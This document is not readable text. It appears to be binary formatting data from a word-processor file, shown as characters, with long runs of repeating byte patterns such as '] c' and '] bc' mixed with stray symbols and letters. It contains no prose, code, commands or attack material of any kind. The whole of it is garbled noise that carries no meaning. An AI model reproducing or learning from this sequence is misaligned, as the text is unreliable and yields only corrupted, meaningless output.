   &'  '  '  %'  &'  ''  >'  ?'  A'  B'  C'  D'  E'  h'  i'  j'  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  '  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &'  '  '  '  '  '  '  '  '  '  (  (  (  (  
(  (  (  (   (  !(  "(  <(  =(  >(  ?(  @(  A(  B(  N(  O(  P(  a(  b(  j(  k(  l(  m(  n(  o(  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &o(  p(  |(  }(  ~(  (  (  (  (  (  (  9)  :)  ;)  N)  *  *  *  +  ,  ,  ,  ,  ,  ,  ,  ,  -  -  /.  0.  1.  >.  y/  z/  {/  /  :0  ;0  zvrniea] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &;0  <0  K0  &1  '1  (1  }1  ~1  1  1  1  1  1  1  1  1  1  1  1  1  1  1  1  2  	2  
2  #2  $2  %2  &2  '2  (2  )2  *2  42  52  62  N2  O2  ¾~zvrnjf          ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c   &O2  P2  i2  j2  k2  l2  m2  n2  o2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  2  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &2  2  2  2  3  3  3  3  3  3  3  3  3  3  73  83  93  :3  7  7  8  8  8  8  )8  ^:  _:  `:  a:  s:  u:  3;  4;  ;  ;  ;  ;  ;  <  ÿ}yuqmhd      ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &<  <  <  <  <  >  >  >  >  >  ?  ?  ?  N?  O?  P?  ?  ?  @  @  @  g@  h@  i@  @  @  @  @  hA  iA  jA  kA  lA  mA  A  A  A  B  B  ¾~ytojfb  ] c  ] c  ] ^c  ] ^c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c   &B  B  B  C  C  C  C  D  D  D  D  E  E  E  E  E  E  |F  }F  ~F  F  \G  ]G  jG  kG  !H  "H  #H  /H  J  J  J  J  K  K  K  K  M  ~yuqmhd           ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  V] c   %M  M  M  M  O  O  O  O  P  P  P  P  P  P  1Q  2Q  3Q  4Q  5Q  6Q  jQ  kQ  lQ  Q  Q  Q  Q  Q  R  R  &R  'R  YR  ZR  [R  6S  7S  bS  |xtplhd           ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  V] c  ] ^c  ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c   %bS  cS  S  S  /T  0T  1T  ST  TT  eT  fT  T  T  T  T  T  T  U  U  6U  7U  aU  bU  U  U  U  V  V  V  V  V  V  V  V  1X  2X  =X  >X  Ŀ{wsokgc_ ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c ] c  ] c  ] c  ] c  	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c ] c  ] c  ] c  ] c  ] c  ] c   %>X  hX  iX  X  X  X  ]Y  ^Y  _Y  Y  Y  Y  Y   Z  5Z  6Z  PZ  QZ  Z  Z  N[  O[  P[  Q[  R[  S[  |[  }[  ~[  [  [  [  \  \  3]  4]  ]  ]  þ}yuqmiea     ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] ^c  ] ^c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c 	] a	c ] c  ] c   %]  ^  ^  >^  ?^  ^  ^  ^  b  b  b  oc  pc  c  c  c  c  d  d  d  d  ne  oe  }e  ~e  e  e  e  e  e  e  g  
g  g  g  g  g  h  h  ÿ{vqlgb  	] a	c 	] a	c 	] a	c 	] a	c 	] a	c ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &h  h  h  +i  ,i  Gi  Hi  Ii  i  i  i  i  i  i  i  i  i  i  i  i  i  j  j  
j  j  j  j  j  j  )j  *j  Uj  Vj  `j  þ}xsnid_Z           	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c  !`j  aj  gj  hj  qj  rj  tj  uj  |j  }j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  j  k  1k  2k  k  þ}xsnid`\W	] a	c ] c  ] c  	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c  "k  k  l  l  Ll  Ml  l  l  l  l  m  m  m  m  m  m  n  n  n  n  n  n  :n  ;n  <n  p  p  9r  :r  <s  =s  Us  Vs  t  t  t  þ}yuqmiea]       ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   ] c   ] ^c   ] ^c   	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c  #t  t  5u  6u  v  v  v   v  !v  "v  Nv  Ov  Pv  jv  kv  lv  v  v  v  v  v  v  v  mx  nx  ox  x  x  x  x  x  x  x  x  
y  y  Dy  Xy  |xrlf`   
U] bc  
U] bc  
U] bc  
U] bc  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   %Xy  ny  oy  py  wy  xy  yy  y  y  y  y  y  y  y  y  y  y  y  y  y  y  y  y  y  y  y  z  z  z  !z  "z  (z  )z  0z  ľ~xrlf`Z           ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  
] ^bc  ] c  ] c  ] c  ] c  ] c  D{ ] uDz ] uD$z ] u] c  D`y ] u] c  ] c  Dx ] u] c  ] c  U] ^bc  U] ^bc  U] ^bc   !0z  1z  7z  8z  >z  ?z  Fz  Gz  ~z  z  z  z  z  z  {  {  j{  k{  {  {  {  {  {  {  J|  K|  P|  Q|  c|  d|  ý{uoic]WQ             ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc  d|  |  |  |  |  |  |  |  |  }  }  F}  G}  H}  }  }  }  }  )~  *~  V~  W~  [~  \~  ~  ~  ~  ~  ~        \  |vpjd^XR] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] a	bc ] a	bc   \  ]              5  6  w  x                  	  
  `  a  r  s  w  x  |  }      ſ~ytoic]W               ] a	bc ] a	bc ] a	bc ] a	bc ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] abc ] abc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc ] bc  ] bc  ] a	bc              G      }  ~  6  7  8  9  :  ;  b  c  d             S  T  p  q      ̍  ͍          ÿ|xtplhd`        ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  U] c  U] c  ] c  ] a	bc ] a	bc ] a	bc ] a	bc ] a	bc  $  E  F  f  g          =  >  S  T      *  +  Q  R  m  n                       -  .  N  O  s  t      ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &                            e  f  g  q  r          ؓ  ٓ      ,  -  W  X  |  }        ÿ~ytoje`             	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   #            ̔  ͔          .  /  N  O  m  n                                  þ}xsnid_Z           	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c  !          
        )  *  6  7  8  9  C  D  I  J  V  W  X  Y  c  d  e              	  
    þ{wsokfa\          ] ^c   ] ^c   ] ^c   ] c   ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c  "  g  h  i  m  n                  Q  R      ˜  ̜      T  U  g  h  i  j  k  l        ޠ  ߠ  t  u  v  ÿ~yuqmiea     ] c  ] c  ] c  ] c  ] c  ] c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c ] c  ] c  	] a	c 	] a	c 	] a	c 	] a	c 	] a	c 	] a	c ] c  ] c  ] c   %v  w                  Ϣ  Т               .  /  B  C  K  L  r  s          ӣ  ԣ        	  $  %  A  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &A  B  n  o      ¤  ä  ֤  פ      	  
      :  ;  J  K  b  c  k  l  z  {            ޥ  ߥ    >  ?  K  L    ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &      *  +  :  ;  <  =  ڲ  ۲  ܲ  /  0  1  4                    !  "  t  u  v        ܴ  ݴ      :  ;  ¾|xtplhd      ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  	] a	c 	] a	c ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &;              h  i                   =  >  ]  ^          ٷ  ڷ          1  2  G  H  I  L      ÿ{wsnjf          ] c  ] c  ] ^c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &              $  %  &  *  i  j  k  m          ٹ  ڹ  ۹            S  T  U  X                ÿ{wsnjfb       ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c   %    ?  @  A  D          ϻ  л  ѻ  ջ          U  V  W  a        ļ          e  f  g      4  5  6  ÿ~zvrnjfb       ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c  ] ^c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] ^c   %6  7  8  9  ]  ^  _      [  \                        3  4  U  V              i  j  |  }  ~      ¾~zvrnjf          ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c   ] c  ] c  ] c   &                              A  B                                        	      |xtplhd      ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c   ] c  ] c  ] c  ] c   &       /  0            2  3  P  Q  k  l                              :  ;  e  f  |  }        ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &              T  U  4  5      ?  @  A  B  C  D  E  z  {  |  4  5  S  T  #  $  8  9            	  :  ;  ÿ}yuqlgb  ] ^c  ] ^c   ] ^c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &;  <          /  0  1  e  f            r  s        	  P  Q  t  u                    zupkfa\          ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c   "            
  #  $  %  :  ;  h  i            T  U  +  ,  t  u                    zupkf`[V   ] bc  ] bc  
] ^bc   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
V] bc  ] bc  
] ^bc  
] ^bc   ] bc  ] bc  ] bc   !                3  4  W  X  Y               v  w  x  y  z  {        F  G          ½zupkfa\W     ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
] ^bc   
] ^bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
V] bc   !      2  3                        T  U                              V  W  þ|vpje`[V   ] bc  ] bc  ] bc  ] bc  
] ^bc  
] ^bc  
] ^bc   
] ^bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !W  X      ^  _  `  l  m          1  2  {  |                K  L  M  N  O  P  Q        þ}xsnhb]X       ] bc  ] bc  
] ^bc   
] ^bc   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !  1  2  3  H  '  (              L  M            ]      '  (              :      {vqlgb]X       ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
V] bc  
V] bc  ] bc  ] bc   !        $  G  H  N  j  ~                                ;  F  - .      þytokfb]X       ] bc  ] bc  ] c  ] bc  ] c  ] bc  ] bc  
V] bc  ] bc  
V] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
V] bc  
V] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !   ! Y Z [ W X      ` a                 	 	 =	 >	 ?	 a	 b	 ~	 ÿ{wsokgc    ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c  ] ^c   ] bc  ] bc   &~	 	 	 	 	 	 	 
 
   K L M # $ 5 6 E F X Y n o ~     -
 .
 
 
 
 
 
 
 
 
 ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &
 
       p q                 8 9           Q ÿ~zvrnje        ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &Q R S                3 4             h          ÿ{wsokgc    ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  V] c  ] c  ] c  ] c  ] c  ] c  ] ^c  ] ^c   &            ! ! ?! @! ! ! " " -" ." H" I" f" g" " " " " " " " A# B# # # # # # # '$ ($ :$ ;$ ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &;$ V$ W$ X$ $ $ $ A% B% % % % ,& -& .& /& U& & ' 9' `' ' ' ' 2( _( ( ( ( y) z) 4* 5* * * + + 7+ 8+ ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &8+ ^+ z+ + %, Y, , , - - s- t- - - - - - - - - - . N. h. i. . . / / / / / 0 0 0 0 	1 
1 f1 ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &f1 g1 v2 w2 x2 y2 z2 {2 2 2 2 =3 >3 3 3 3 Q4 R4 S4 b4 c4 v4 4 4 4 4 4 4  5 5 15 I5 J5 ^5 w5 5 }xsnid_           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] ^c  ] ^c  ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c   #                	  
      
                                         !  "  #  $  %  &  '  (  )  *  +  ,  -  .  /  0  1  2  3  4  5  6  7  8  9  :  ;  <  =  >  ?  5 5 5 5 5 6 6 46 Q6 o6 6 6 6 6 6 6 6 7 7 7 &7 27 =7 I7 W7 X7 s7 7 7 7 7 7 7 
8 þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !
8 8 8 -8 B8 W8 e8 f8 8 8 8 8 9 .9 H9 b9 9 9 9 9 9  : : /: 0: >: R: Z: y: : : : : : þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !: $; ?; P; T; U; q; r; ; ; ; < < 4< 7< 8< M< d< }< < < < < < = = /= <= L= O= P= b= y= = þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   != = = = = 	> -> ]> `> l> o> p> }> > > > > > > > ? ? )? ,? -? R? x? y? ? ? ? @ *@ O@ þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !O@ t@ @ @ @ A 'A @A WA jA mA nA A A A A A B GB wB B B B B B B B C !C $C %C @C \C pC þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !pC C C C C C D D FD PD UD aD D D D D D D D D D E #E 5E JE ME E E F QF |F F F F þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !F F F F F G "G #G 9G WG nG G G G G G G G G H H $H 9H eH H H H H I I 
I I I )I þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !)I =I UI XI qI I I I I I #J 6J 9J :J tJ }J J J J J J J 1K :K fK gK K K K K K L ;L <L þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !<L `L aL mL L L M  M !M NM OM ]M ^M kM M M M M M M 	N MN PN QN ZN [N oN N N N N N N N þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !N N N N N N N N N N O 3O 4O cO qO O O O O O O P P P P  P ,P @P AP ^P wP xP P P þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !P P P P Q 8Q 9Q cQ ~Q Q Q Q Q Q Q R 8R 9R MR cR {R R R R S 
S %S ES eS S S S S !T þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !!T 8T RT lT T T T T T U AU mU nU U U U U U V &V 'V >V WV zV {V V V V V  W W W  W lW þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !lW W W W W W W W X 4X TX ^X aX eX |X X X X X X X X X X X X X X 	Y Y CY fY }Y Y þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc